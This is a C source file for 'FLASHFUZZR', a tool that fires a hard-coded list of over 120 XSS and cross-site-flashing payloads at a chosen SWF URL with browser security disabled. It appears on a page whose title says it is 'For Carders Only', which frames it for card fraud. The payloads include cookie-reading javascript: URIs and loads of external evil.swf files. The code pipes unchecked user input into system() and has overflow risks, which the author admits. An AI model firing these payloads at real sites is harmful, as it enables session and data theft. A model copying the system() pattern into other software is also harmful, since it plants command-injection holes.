For Carders Only An Automatic Tools To Fine Cc


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <malloc.h>
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wunused-result"
#pragma GCC diagnostic ignored "-Wformat"
#pragma GCC diagnostic pop


/*********************************************************************************
* ___ _ ___ ___ _ _ ___ _ _ ____ ____ ___ *
* | __| | | / \ / __| | || | | __| | | | | |_ / |_ / | _ \ *
* | _| | |__ | - | \__ \ | __ | | _| | |_| | / / / / | / *
* _|_|_ |____| |_|_| |___/ |_||_| _|_|_ \___/ /___| /___| |_|_\ *
*_| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""|*
*"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'*
* *
**********************************************************************************
* Version 1.0 - Written by MLT * Usage: *
* * *
* Dependencies: Linux * Follow the on-screen instructions *
* gnome-www-browser* Supply SWF as URL only *
* Flare * Ensure that you're using a linux *
* * system with Flare *
* I am not responsible for this* installed. *
* tool being used for illegal * *
* or malicious purposes * I will be writing a Windows port for *
* * this at some point, but for now this *
* P.S: I know this is written * is designed for linux. *
* in a sloppy manner, but it * *
* gets the job done regardless * you'll need to ensure you input the *
* * correct full path for directory for *
* complition tested w/ gcc/g++ * your flare install *
* (c11/gnu11 std) * *
**********************************************************************************
* protip: remember to enable flash in firefox (its disabled by default) *
* gnome-www-browser will launch your default browser, chrome is best choice *
* *
* make sure you have your browser already open with a few tabs open before *
* running the program, FULL README is located at bottom of the source *
*********************************************************************************/

void clear()
{
    int x;
    for ( x = 0; x < 10; x++ )
    {
        printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"); // too gay for system("cls") or clrscr();
    }
}

int main(void)

{
    DIR *path;
    FILE *fp;
    struct dirent *ptr;
    int primaryInput, helpMenuInput, usageInput, usrInput, fuzzInput, finalInput;
    int j = 0;
    int num = 0;
    char* files[20]; // modify this if necessary
    char in[150], url[150], dir[100], cmd[1000], flare[1000], buff[1000], buffer[1000], line_count[50];
    char the_vectors[129][1000] = {
                                  "'#alert(1337)'",
                                  "'#prompt(1)'",
                                  "'#confirm(1)'",
                                  "'#prompt`1`'",
                                  "'#confirm`1`'",
                                  "'?alert(/XSS/)'",
                                  "'?prompt(/XSS/)'",
                                  "'?confirm(/XSS/)'",
                                  "'?prompt`XSS`'",
                                  "'?confirm`XSS`'",
                                  "'#javascript:confirm(1)'",
                                  "'#javascript:prompt(1)'",
                                  "'#javascript:alert(1337)'",
                                  "'#javascript:confirm(1)//'",
                                  "'#javascript:prompt(1)//'",
                                  "'#javascript:alert(1)//'",
                                  "'#javascript:confirm`xss`'",
                                  "'#javascript:prompt`xss`'",
                                  "'?javascript:alert(1337)'",
                                  "'?javascript:prompt(1)'",
                                  "'?javascript:confirm(1)'",
                                  "'?javascript:prompt`xss`'",
                                  "'?javascript:confirm`xss`'",
                                  "'#getURL(javascript:alert(/XSS/))'",
                                  "'#getURL(javascript:prompt(/XSS/))'",
                                  "'#getURL(javascript:confirm(/XSS/))'",
                                  "'#asfunction:getURL,javascript:alert(1337)//'",
                                  "'#asfunction:getURL,javascript:prompt(0)//'",
                                  "'#asfunction:getURL,javascript:confirm(1337)//'",
                                  "'#asfunction:getURL,javascript:prompt`xss`//'",
                                  "'#asfunction:getURL,javascript:confirm`xss`//'",
                                  "'?asfunction:getURL,javascript:alert(1)//'",
                                  "'?asfunction:getURL,javascript:prompt(1)//'",
                                  "'?asfunction:getURL,javascript:confirm(1)//'",
                                  "'?asfunction:getURL,javascript:prompt`1`//'",
                                  "'?asfunction:getURL,javascript:confirm`1`//'",
                                  "'#getURL,javascript:alert(1)'",
                                  "'#getURL,javascript:prompt(1)'",
                                  "'#getURL,javascript:confirm(1)'",
                                  "'#getURL,javascript:prompt`1`'",
                                  "'#getURL,javascript:confirm`1`'",
                                  "'?getURL(javascript:prompt(/XSS/))'",
                                  "'?getURL(javascript:confirm(/XSS/))'",
                                  "'?getURL,javascript:alert(1)'",
                                  "'?getURL,javascript:prompt(1)'",
                                  "'?getURL,javascript:confirm(1)'",
                                  "'?getURL,javascript:prompt`1`'",
                                  "'?getURL,javascript:confirm`1`'",
                                  "'?goto,javascript:prompt(1)'",
                                  "'?goto,javascript:confirm(1)'",
                                  "'?goto,javascript:prompt`x`'",
                                  "'?goto,javascript:confirm`x`'",
                                  "'?clickTAG=javascript:prompt(/xss/)",
                                  "'?clickTAG=javascript:confirm(/xss/)",
                                  "'?clickTAG=javascript:prompt`xss`",
                                  "'?clickTAG=javascript:confirm`xss`",
                                  "'?url=javascript:prompt(/xss/)'",
                                  "'?url=javascript:confirm(/xss/)'",
                                  "'?url=javascript:prompt`xss`'",
                                  "'?url=javascript:confirm`xss`'",
                                  "'?clickTAG=javascript:prompt(/xss/)&TargetAS='",
                                  "'?clickTAG=javascript:confirm(/xss/)&TargetAS='",
                                  "'?clickTAG=javascript:prompt`xss`&TargetAS='",
                                  "'?clickTAG=javascript:confirm`xss`&TargetAS='",
                                  "'?TargetAS=javascript:prompt(/xss/)'",
                                  "'?TargetAS=javascript:confirm(/xss/)'",
                                  "'?TargetAS=javascript:confirm`x`'",
                                  "'?mode=tags&tagcloud=<tags><a+href=\"javascript:alert(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
                                  "'?mode=tags&tagcloud=<tags><a+href=\"javascript:prompt(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
                                  "'?mode=tags&tagcloud=<tags><a+href=\"javascript:confirm(document.cookie)\"+style=\"font-size:+40pt\">Click me</a></tags>'",
                                  "'?mode=tags&tagcloud=<tags><a+href=\"javascript:alert`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
                                  "'?mode=tags&tagcloud=<tags><a+href=\"javascript:prompt`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
                                  "'?mode=tags&tagcloud=<tags><a+href=\"javascript:confirm`1`\"+style=\"font-size:+40pt\">Click me</a></tags>'",
                                  "'?mode=tags&tagcloud=<tags><a+href=\"http://google.com\"+style=\"font-size:+40pt\">Click me</a></tags>'",
                                  "'?mode=tags&tagcloud=<tags><a+href=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==\"+style=\"font-size:+40pt\">Click me</a></tags>'",
                                  "'?baseurl=asfunction:getURL,javascript:prompt(1)//'",
                                  "'?baseurl=asfunction:getURL,javascript:confirm(1)//'",
                                  "'?baseurl=asfunction:getURL,javascript:confirm`1`//'",
                                  "'?URI=javascript:prompt(/xss/)'",
                                  "'?URI=javascript:confirm(/xss/)'",
                                  "'?getURLValue=javascript:confirm(0)'",
                                  "'?base=javascript:prompt(0)'",
                                  "'?base=javascript:confirm`0`'",
                                  "'?URI=javascript:prompt(/xss/)'",
                                  "'?URI=javascript:confirm`xss`'",
                                  "'?URL=javascript:prompt(/xss/)'",
                                  "'?callback=javascript:prompt(/xss/)'",
                                  "'?callback=javascript:confirm`xss`'",
                                  "'?getURLValue=javascript:prompt(/xss/)'",
                                  "'?getURLValue=javascript:confirm`xss`'",
                                  "'?getURLValue=http://evil.com'",
                                  "'?getURLValue=//www.evil.com'",
                                  "'?getUrlBlankVar=javascript:prompt(0)'",
                                  "'?getUrlBlankVar=javascript:confirm`0`'",
                                  "'?getUrlParentVar=javascript:prompt(0)'",
                                  "'?getUrlParentVar=javascript:confirm(0)'",
                                  "'?getUrlJSParam=\');function eval(a){}prompt(0)//'"
                                  "'?getUrlJSParam=');confirm(0)//'",
                                  "'?goto=javascript:confirm(/xss/)'",
                                  "'?pg=javascript:prompt(/xss/)'",
                                  "'?page=javascript:alert(/xss/)'",
                                  "'?skinName=https://sites.google.com/site/rcannings2/DoKnowEvil'",
                                  "'?skinName=asfunction:getURL,javascript:alert(1)//'",
                                  "'?skinName=asfunction:getURL,javascript:confirm`1`//'",
                                  "'?debugMode=1&dataURL=%%27><img+src%3D\"https://rcannings.googlepages.com/'",
                                  "'?\"><img+src=\"http://rcannings.googlepages.com/DoKnowEvil.swf?.jpg\">'",
                                  "'?onend=javascript:prompt(1)//'",
                                  "'?onend=javascript:confirm(1)//'",
                                  "'?onend=javascript:confirm`1`//'",
                                  "'?\");function%%20someFunction(a){}prompt(1)//'",
                                  "'?\");function%%20someFunction(a){}confirm(1)//'",
                                  "'?a=1:0;prompt(0)//'",
                                  "'?a=1:0;alert(0)//'",
                                  "'?a=1:0;confirm`0`//'",
                                  "'?loadMovieVar=http://test.com/evil.swf'",
                                  "'?loadMovieNumVar=http://test.com/evil.swf'",
                                  "'?loadMovieVar=javascript:prompt(0)'",
                                  "'?loadMovieVar=javascript:cofirm(0)'",
                                  "'?loadMovieVar=javascript:alert`0`'",
                                  "'?xmlLoadVar=asfunction:getURL,javascript:prompt(0)'",
                                  "'?xmlLoadVar=asfunction:getURL,javascript:confirm(0)'",
                                  "'?xmlLoadVar=asfunction:getURL,javascript:alert`0`'",
                                  "'?htmlVar=<a href=\"asfunction:getURL,javascript:prompt(0)\"> Click here</a>'",
                                  "'?htmlVar=<a href=\"asfunction:getURL,javascript:confirm(0)\"> Click here</a>'",
                                  "'?htmlVar=<a href=\"asfunction:getURL,javascript:alert`0`\"> Click here</a>'",
                                  "'?htmlVar=a<img src=\'evil.swf\' />'",
                                  "'?fontVar=\"><img src=\"evil.swf\"><\"'",
                                  "'?externalInterfaceVar=confirm(0)'",
                                  "'?externalInterfaceVar=prompt`0`'",
                                };

                                /**********************************************
                                * will update with moar vectors sometime soon *
                                * if anyone has any contributions then feel *
                                * free to contact me via email *
                                **********************************************/

MainMenu: // LOL YEP
         
printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
printf(" 0001110010| |1010100111\n");
printf(" 0001111101| Automated GET-Based XSS/XSF Fuzzer for SWF's |0110111010\n");
printf(" 0100110000| Version 1.0 - Written by MLT (@ret2libc) |1001100001\n");
printf(" 1010011111| |1010011010\n");
printf(" 0001110110| Contact me: 0day@chef.net |0010011111\n");
printf(" 1011001010| |1001101110\n");
printf(" 0110101110| |0001101001\n");
printf(" 1011110100| |0001000100\n");
printf(" 0101010111| Type '1' to display instructions |0111010000\n");
printf(" 1100111101| |1010101101\n");
printf(" 1101111110| .-~*~--,. .-. |0011011000\n");
printf(" 1110111010| .-~-. ./OOOOOOOOO\\.'OOO`9~~-. |0101101101\n");
printf(" 0110001010| .`OOOOOO.OOM.OLSONOOOOO@@OOOOOO\\ |0000110111\n");
printf(" 1101100000| /OOOO@@@OO@@@OO@@@OOO@@@@@@@@OOOO`. |1001001111\n");
printf(" 0000010010| |OO@@@WWWW@@@@OOWWW@WWWW@@@@@@@OOOO). |0000000001\n");
printf(" 1111011101| .-'OO@@@@WW@@@W@WWWWWWWWOOWW@@@@@OOOOOO} |1110011110\n");
printf(" 0011101001| /OOO@@O@@@@W@@@@@OOWWWWWOOWOO@@@OOO@@@OO| |1101101001\n");
printf(" 1111001000| lOOO@@@OO@@@WWWWWWW\\OWWWO\\WWWOOOOOO@@@O.' |1000100000\n");
printf(" 1011000001| \\OOO@@@OOO@@@@@@OOW\\ \\WWWW@@@@@@@O'. |0010000000\n");
printf(" 1000100101| `,OO@@@OOOOOOOOOOWW\\ \\WWWW@@@@@@OOO) |1111100100\n");
printf(" 1001000000| \\,O@@@@@OOOOOOWWWWW\\ \\WW@@@@@OOOO.' |1010111100\n");
printf(" 0110101001| `~c~8~@@@@WWW@@W\\ \\WOO|\\UO-~' |1111001010\n");
printf(" 1100111110| (OWWWWWW@/\\W\\ ___\\WO) |1001000001\n");
printf(" 1111111000| `~-~'' \\ \\WW=*' |0100001001\n");
printf(" 0001110111| __\\ \\ |1010000111\n");
printf(" 1111000011| \\ \\ |0101110101\n");
printf(" 0110000100| \\ __\\ |1011010010\n");
printf(" 1111010101| \\ \\ |0011010110\n");
printf(" 0110000010| \\ \\ |1010100110\n");
printf(" 0101110100| \\ \\ |0110110110\n");
printf(" 1100100011| \\ \\ |1100110110\n");
printf(" 0001110011| \\ \\ |0110001001\n");
printf(" 0111011100| \\ \\ |0100001111\n");
printf(" 0000001011| \\_\\ |0011111110\n");
printf(" 1000110000| |0001101111\n");
printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

scanf("%d", &primaryInput);

  if (primaryInput == 1)
    {

    HelpMenu:

    clear();

       printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
       printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001111101| Help Menu |0110111010\n");
       printf(" 1010011111| OPTIONS: |1010011010\n");
       printf(" 0110101110| |0001101001\n");
       printf(" 0110101110| 1 - Usage Guide |0001101001\n");
       printf(" 0110101110| 2 - Fuzz for XSS/XSF |0001101001\n");
       printf(" 0110101110| 3 - Decompile SWF |0001101001\n");
       printf(" 0110101110| 4 - Return to start page |0001101001\n");
       printf(" 0110101110| |0001101001\n");
       printf(" 0110101110| [ Select an option to continue ] |0001101001\n");
       printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");
    }


  else if (primaryInput != 1)
    {
    clear();

      fprintf(stderr, "\nRead the instructions next time!\n");
      fprintf(stderr, "\nProgram closing!\n");
      exit(0);

      /*************************
      * worst error handling in*
      * existence because i'm *
      * fkn lazy :) *
      *************************/
    }
   
     scanf("%d", &helpMenuInput);  

  if (helpMenuInput == 1)
    {
    clear();

       printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
       printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001111101| Usage Guide |0110111010\n");                
       printf(" 0001110010| |1010100111\n");
       printf(" 0001110010| To fuzz an SWF for XSS/XSF simply navigate to the help menu then select |1010100111\n");
       printf(" 0001111101| the 'fuzz for XSS/XSF' option' and input the remote URL to the SWF file |0110111010\n");
       printf(" 0001110010| when instructed - firefox will then begin to open browser windows and |1010100111\n");
       printf(" 0001110010| begin fuzzing for vulns. |1010100111\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001110010| To decompile an SWF, navigate to the help menu and select the 'decompile |1010100111\n");
       printf(" 0001110010| SWF' option and follow the instructions on screen |1010100111\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001110010| Dependencies: |1010100111\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001110010| - Mozilla Firefox |1010100111\n");
       printf(" 0001110010| - Linux |1010100111\n");
       printf(" 0001110010| - Flare |1010100111\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001110010| Type '1' to return to help menu |1010100111\n");
       printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

       scanf("%d", &usageInput);

       if (usageInput == 1)
         {
          clear();
          goto HelpMenu; // sue me :)
         }

    }

  else if (helpMenuInput == 2)
    {

      clear();

       printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
       printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001111101| Begin Fuzzing |0110111010\n");                
       printf(" 0001110010| |1010100111\n");
       printf(" 0001110010| In order to begin fuzzing for vulnerabilities, please enter the direct |1010100111\n");
       printf(" 0001111101| link to the remote URL below and hit the 'enter' key to confirm. Ensure |0110111010\n");
       printf(" 0001110010| that firefox is installed and that the URL to the SWF you're testing is |1010100111\n");
       printf(" 0001110010| correctly typed. |1010100111\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001110010| ENTER PATH TO SWF URL: |1010100111\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001110010| Type '1' to return to help menu |1010100111\n");
       printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

      scanf("%d", &usrInput);

       if (usrInput == 1)
         {
          clear();
          goto HelpMenu; // sue me :)
         }

         scanf("%s", url);
         printf("\n\n\n\n\n [+] Fuzzing initiated on: %s [+]\n\n\n\n\n", url);

         size_t i = 0;

          for (i = 0; i < sizeof(the_vectors) / sizeof(the_vectors[0]); i++)
            {          
           snprintf(buffer, sizeof buffer, "%s%s", url, the_vectors[i]);
           snprintf(cmd, sizeof cmd, "%s%s", "gnome-www-browser --disable-web-security ", buffer);
           system("sleep .10");
           system(cmd);
           clear();
            }

         printf("\n\n\n\n\n [+] Fuzzing on: %s complete [+]\n\n\n\n\n", url);
         printf(" check each browser tab to see if any vulns are present\n\n\n");
         printf("\n Enter '1' to exit the program, or alternatively enter '2' to return to the main menu\n\n\n");

         scanf("%d", &fuzzInput);

         if (fuzzInput == 1)
          {
            printf("\nProgram closing!\n\n\n");
            exit(0);
          }

         if (fuzzInput == 2)
          {
            clear();
            goto MainMenu; // sue me :)
          }

          else if (fuzzInput != 1 || fuzzInput != 2)
          {
            clear();

            fprintf(stderr, "\nRead the instructions next time!\n");
            fprintf(stderr, "\nProgram closing!\n\n\n");
            exit(0);

            /*************************
            * worst error handling in*
            * existence because i'm *
            * fkn lazy :) *
            *************************/
         }

    }

  else if (helpMenuInput == 3)
    {
       clear();
   
       printf("\n\n 1011101110+-------------------------------------------------------------------------------------------------+1010010011\n");
       printf(" 0000011100| [ FLASHFUZZR ] |0111110010\n");
       printf(" 0001110010| |1010100111\n");
       printf(" 0001111101| SWF Decompiler |0110111010\n");
       printf(" 1010011111| |1010011010\n");
       printf(" 0110101110| Remember to modify opendir(); to the path for your 'flare' directory |0001101001\n");
       printf(" 0110101110| Enter any key to begin decompilation |0001101001\n");
       printf(" 0110110100+-------------------------------------------------------------------------------------------------+1011010000\n\n\n");

       /******************************************
       * make sure to follow the installation *
       * instructions for flare and when running *
       * this program specify the full path to *
       * the directory where you unpacked the *
       * tarball for flare. *
       * *
       * you should also ensure that you have *
       * the SWF files that you wish to decompile*
       * stored within this same directory *
       * *
       * I didn't bother implementing proper err *
       * handling for this, so if you fuck up you*
       * won't be warned. Follow the instructions*
       * and it should work fine :) *
       ******************************************/

       getchar();
       clear();
       printf("\nEnter the path to the directory of your flare install:\n\n\n");
       scanf("%s", dir);                                                    
                                                                             
  if ((path = opendir (dir)) != NULL)
       {

       while ((ptr = readdir (path)) != NULL)
        {
          if (ptr->d_name[0] != '.')
          {
            printf ("%s\n", ptr->d_name);      
            fp = fopen("listing.txt", "aw+");
            strcpy(in, ptr->d_name);
            strcat(in, "\n");
            fputs(in, fp);
            fclose(fp);
          }
        }
       closedir(path);
        }
  else
   {
      fprintf(stderr, "\nInvalid directory\n");
   }

      fp = fopen("listing.txt", "r");

      while(fgets(line_count, sizeof line_count, fp)!=NULL)
      {
        files[j]=malloc(sizeof(line_count));
        strcpy(files[j],line_count);
        j++;
        num++;
      }

      for (int x=0 ; x < num+1; x++)
      {
       if (files[x] != '\0')
        {
          printf("Performing decompilation on: \n%s", files[x]);
          size_t y = 0;

          for (y = 0; y < sizeof(files) / sizeof(files[0]); y++)
            {          
               snprintf(buff, sizeof buff, "%s", files[y]);
               snprintf(flare, sizeof flare, "%s%s", "./flare ", buff);
               system(flare);
               clear();
           }
        }
     }


      fclose(fp);
      system("rm listing.txt");
      clear();
      printf("\nDecompilation complete!\n\n\n");
      printf("\nEnter '1' to exit the program, or alternatively enter '2' to return to the main menu\n\n\n");
      scanf("%d", &finalInput);

        if (finalInput == 1)
        {
          printf("\nProgram closing!\n\n\n");
          exit(0);
        }

        if (finalInput == 2)
        {
          clear();
          goto MainMenu; // sue me :)
        }
 
}

   if (helpMenuInput == 4)
    {
      clear();
      goto MainMenu; // sue me :)
    }

  else if (helpMenuInput != 1 || helpMenuInput != 2 || helpMenuInput != 3 || helpMenuInput != 4)
    {    
      clear();

      fprintf(stderr, "\nRead the instructions next time!\n");
      fprintf(stderr, "\nProgram closing!\n\n\n");
      exit(0);

      /*************************
      * worst error handling in*
      * existence because i'm *
      * fkn lazy :) *
      *************************/
    }

return 0;

}

/*************************************************************************************************
* README: Full list of dependancies and errors you may encounter *
**************************************************************************************************
* *
* The purpose of this program is to allow you to easily perform blackbox + whitebox testing on *
* SWF files for vulns such as cross site scripting and cross site flashing. *
* In addition to this, I've also added some functionality for decompilation of SWF's. *
* *
* I noticed flare (probably the most basic command-line flash decompiler) is very limited in *
* what you can do with it, so I've added a feature here to allow you to specify a directory and *
* have flare automatically decompile every SWF file within that directory so you can then view *
* the .flr files and begin to analyze the code for bugs. *
* *
* There are a few dependancies, for now this is working only for linux, you'll need to ensure *
* that you have gnome-www-browser installed as i'm using this as an alternative to xdg-open due *
* to extra functionality when launching a URL. *
* *
* In order to have the SWF decompilation feature working properly, you'll have to ensure you *
* specify the correct directory where your flare install is located when prompted *
* *
* you'll also want to modify the size of files[] as appropriate (assuming you're decompiling *
* more than 20 files at once) *
* *
* In order to install flare, download the tarball from here: *
* http://www.nowrap.de/download/flare06linux.tgz *
* *
* I'm making this launch browser processes rather than opening a socket because this greatly *
* reduces (100% reduction) false positives and allows you to see the results in real time *
* *
* I suggest using google chrome for this, firefox will probably be buggy. Before you run this *
* program, make sure you already have google chrome open with more than one tab opened. *
* *
* If you experience any issues with chrome not opening each instance in a new tab instantly, then*
* run the following command then try again: *
* *
* pkill -9 chrome *
* *
* if there's still an issue, try running this: *
* *
* for i in `pgrep chrome` ; do kill $i ; sleep .10 ; done" *
* *
* I didnt bother implementing proper error handling for the CLI-based menu (as you can prob tell)*
* Just make sure to follow the on-screen instructions and you shouldn't have any problems. *
* *
* also i'm aware this is probably vulnerable to BoF and is also passing user inputs to system(); *
* but I see no real risk here. If you wanna perform RCE or BoF ON YOUR OWN SYSTEM LOCALLY then *
* be my guest. *
* *
* ensure that you have write privs for the area you're running this in. *
* *
* to compile and execute: *
* gcc -o flashfuzz flashfuzz.c -std=gnu11 *
* ./flashfuzz *
* *
*************************************************************************************************/

Post a Comment

أحدث أقدم